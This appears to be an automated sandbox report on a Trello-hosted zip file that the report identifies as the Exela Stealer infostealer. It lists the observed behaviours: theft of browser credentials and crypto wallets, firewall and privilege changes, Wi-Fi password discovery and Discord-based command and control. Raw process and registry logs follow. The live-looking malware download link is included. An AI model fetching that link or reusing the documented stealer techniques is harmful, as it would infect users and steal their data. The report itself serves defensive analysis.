Analysis
-
max time kernel
282s -
max time network
272s -
platform
windows10-2004_x64 -
resource
win10v2004-20240730-en -
resource tags
arch:x64arch:x86image:win10v2004-20240730-enlocale:en-usos:windows10-2004-x64system -
submitted
01-08-2024 06:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip
Resource
win10v2004-20240730-en
General
-
Target
https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip
Malware Config
Signatures
-
Exela Stealer
Exela Stealer is an open source stealer originally written in .NET and later transitioned to Python that was first observed in August 2023.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4128 netsh.exe 5000 netsh.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 1524 cmd.exe 1660 powershell.exe -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 56 discord.com 57 discord.com 58 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 53 ip-api.com -
pid Process 3612 ARP.EXE 3176 cmd.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 5 IoCs
pid Process 1532 tasklist.exe 4820 tasklist.exe 4928 tasklist.exe 3876 tasklist.exe 2172 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
pid Process 4052 cmd.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 208 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 3144 cmd.exe 2372 netsh.exe -
System Network Connections Discovery 1 TTPs 1 IoCs
Attempt to get a listing of network connections.
pid Process 4448 NETSTAT.EXE -
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
pid Process 232 WMIC.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 4536 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
pid Process 3048 ipconfig.exe 4448 NETSTAT.EXE -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 1244 systeminfo.exe -
Kills process with taskkill 8 IoCs
pid Process 2724 taskkill.exe 3432 taskkill.exe 376 taskkill.exe 2880 taskkill.exe 4052 taskkill.exe 4824 taskkill.exe 1216 taskkill.exe 4708 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\system32\appwiz.cpl,-160#immutable1 = "Uninstall or change programs on your computer." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sdcpl.dll,-101#immutable1 = "Backup and Restore (Windows 7)" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000010000001800000030f125b7ef471a10a5f102608c9eebac0a000000a0000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\telephon.cpl,-2#immutable1 = "Configure your telephone dialing rules and modem settings." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-601#immutable1 = "Indexing Options" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\timedate.cpl,-52#immutable1 = "Set the date, time, and time zone for your computer." explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "48" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-100#immutable1 = "Mouse" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\RADCUI.dll,-15301#immutable1 = "Manage your RemoteApp and Desktop Connections" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\autoplay.dll,-2#immutable1 = "Change default settings for CDs, DVDs, and devices so that you can automatically play music, view pictures, install software, and play games." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fvecpl.dll,-2#immutable1 = "Protect your PC using BitLocker Drive Encryption." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\fhcpl.dll,-52#immutable1 = "File History" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0 = 0c0001008421de39090000000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Vid = "{0057D0E0-3573-11CF-AE69-08002B2E1262}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0\0\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-5#immutable1 = "View and update your device hardware settings and driver software." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4312#immutable1 = "Internet Options" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\inetcpl.cpl,-4313#immutable1 = "Configure your Internet display and connection settings." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\mmsys.cpl,-300#immutable1 = "Sound" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\GroupView = "0" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202020202 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0\0\NodeSlot = "18" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0\0\MRUListEx = ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\MRUListEx = 00000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\accessibilitycpl.dll,-45#immutable1 = "Make your computer easier to use." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\sud.dll,-10#immutable1 = "Choose which programs you want Windows to use for activities like web browsing, editing photos, sending e-mail, and playing music." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\GroupView = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\GroupByDirection = "1" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-1#immutable1 = "Power Options" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\DiagCpl.dll,-15#immutable1 = "Troubleshoot and fix common computer problems." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\srchadmin.dll,-602#immutable1 = "Change how Windows indexes to search faster" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\usercpl.dll,-2#immutable1 = "Change user account settings and passwords for people who share this computer." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\main.cpl,-101#immutable1 = "Customize your mouse settings, such as the button configuration, double-click speed, mouse pointers, and motion speed." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\SyncCenter.dll,-3000#immutable1 = "Sync Center" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "3" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19 explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\powercpl.dll,-2#immutable1 = "Conserve energy or maximize performance by choosing how your computer manages power." explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\ImmutableMuiCache\Strings\52C64B7E\@C:\Windows\System32\devmgr.dll,-4#immutable1 = "Device Manager" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 000000000500000004000000030000000200000001000000ffffffff explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6 = 14001f706806ee260aa0d7449371beb064c986830000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\NodeSlot = "16" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{DE4F0660-FA10-4B8F-A494-068B20B22307}\LogicalViewMode = "2" explorer.exe Key created \REGISTRY\USER\S-1-5-21-1266786182-1874524688-71015548-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\6\0\0 explorer.exe -
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3028 explorer.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2956 msedge.exe 2956 msedge.exe 1352 msedge.exe 1352 msedge.exe 4852 identity_helper.exe 4852 identity_helper.exe 2616 msedge.exe 2616 msedge.exe 1660 powershell.exe 1660 powershell.exe 1660 powershell.exe 1892 powershell.exe 1892 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 4148 WMIC.exe Token: SeSecurityPrivilege 4148 WMIC.exe Token: SeTakeOwnershipPrivilege 4148 WMIC.exe Token: SeLoadDriverPrivilege 4148 WMIC.exe Token: SeSystemProfilePrivilege 4148 WMIC.exe Token: SeSystemtimePrivilege 4148 WMIC.exe Token: SeProfSingleProcessPrivilege 4148 WMIC.exe Token: SeIncBasePriorityPrivilege 4148 WMIC.exe Token: SeCreatePagefilePrivilege 4148 WMIC.exe Token: SeBackupPrivilege 4148 WMIC.exe Token: SeRestorePrivilege 4148 WMIC.exe Token: SeShutdownPrivilege 4148 WMIC.exe Token: SeDebugPrivilege 4148 WMIC.exe Token: SeSystemEnvironmentPrivilege 4148 WMIC.exe Token: SeRemoteShutdownPrivilege 4148 WMIC.exe Token: SeUndockPrivilege 4148 WMIC.exe Token: SeManageVolumePrivilege 4148 WMIC.exe Token: 33 4148 WMIC.exe Token: 34 4148 WMIC.exe Token: 35 4148 WMIC.exe Token: 36 4148 WMIC.exe Token: SeIncreaseQuotaPrivilege 4536 WMIC.exe Token: SeSecurityPrivilege 4536 WMIC.exe Token: SeTakeOwnershipPrivilege 4536 WMIC.exe Token: SeLoadDriverPrivilege 4536 WMIC.exe Token: SeSystemProfilePrivilege 4536 WMIC.exe Token: SeSystemtimePrivilege 4536 WMIC.exe Token: SeProfSingleProcessPrivilege 4536 WMIC.exe Token: SeIncBasePriorityPrivilege 4536 WMIC.exe Token: SeCreatePagefilePrivilege 4536 WMIC.exe Token: SeBackupPrivilege 4536 WMIC.exe Token: SeRestorePrivilege 4536 WMIC.exe Token: SeShutdownPrivilege 4536 WMIC.exe Token: SeDebugPrivilege 4536 WMIC.exe Token: SeSystemEnvironmentPrivilege 4536 WMIC.exe Token: SeRemoteShutdownPrivilege 4536 WMIC.exe Token: SeUndockPrivilege 4536 WMIC.exe Token: SeManageVolumePrivilege 4536 WMIC.exe Token: 33 4536 WMIC.exe Token: 34 4536 WMIC.exe Token: 35 4536 WMIC.exe Token: 36 4536 WMIC.exe Token: SeDebugPrivilege 1532 tasklist.exe Token: SeIncreaseQuotaPrivilege 4536 WMIC.exe Token: SeSecurityPrivilege 4536 WMIC.exe Token: SeTakeOwnershipPrivilege 4536 WMIC.exe Token: SeLoadDriverPrivilege 4536 WMIC.exe Token: SeSystemProfilePrivilege 4536 WMIC.exe Token: SeSystemtimePrivilege 4536 WMIC.exe Token: SeProfSingleProcessPrivilege 4536 WMIC.exe Token: SeIncBasePriorityPrivilege 4536 WMIC.exe Token: SeCreatePagefilePrivilege 4536 WMIC.exe Token: SeBackupPrivilege 4536 WMIC.exe Token: SeRestorePrivilege 4536 WMIC.exe Token: SeShutdownPrivilege 4536 WMIC.exe Token: SeDebugPrivilege 4536 WMIC.exe Token: SeSystemEnvironmentPrivilege 4536 WMIC.exe Token: SeRemoteShutdownPrivilege 4536 WMIC.exe Token: SeUndockPrivilege 4536 WMIC.exe Token: SeManageVolumePrivilege 4536 WMIC.exe Token: 33 4536 WMIC.exe Token: 34 4536 WMIC.exe Token: 35 4536 WMIC.exe Token: 36 4536 WMIC.exe -
Suspicious use of FindShellTrayWindow 59 IoCs
pid Process 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 3028 explorer.exe 3028 explorer.exe 3028 explorer.exe 3028 explorer.exe 3028 explorer.exe 3028 explorer.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe 1352 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1352 wrote to memory of 3968 1352 msedge.exe 83 PID 1352 wrote to memory of 3968 1352 msedge.exe 83 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 1524 1352 msedge.exe 85 PID 1352 wrote to memory of 2956 1352 msedge.exe 86 PID 1352 wrote to memory of 2956 1352 msedge.exe 86 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 PID 1352 wrote to memory of 1660 1352 msedge.exe 87 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2064 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://trello.com/1/cards/6670a3d2d8c777c60b100cd9/attachments/6670a3e6c03059b0605e5b1f/download/setup_x86-64_build_4355.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1352 -
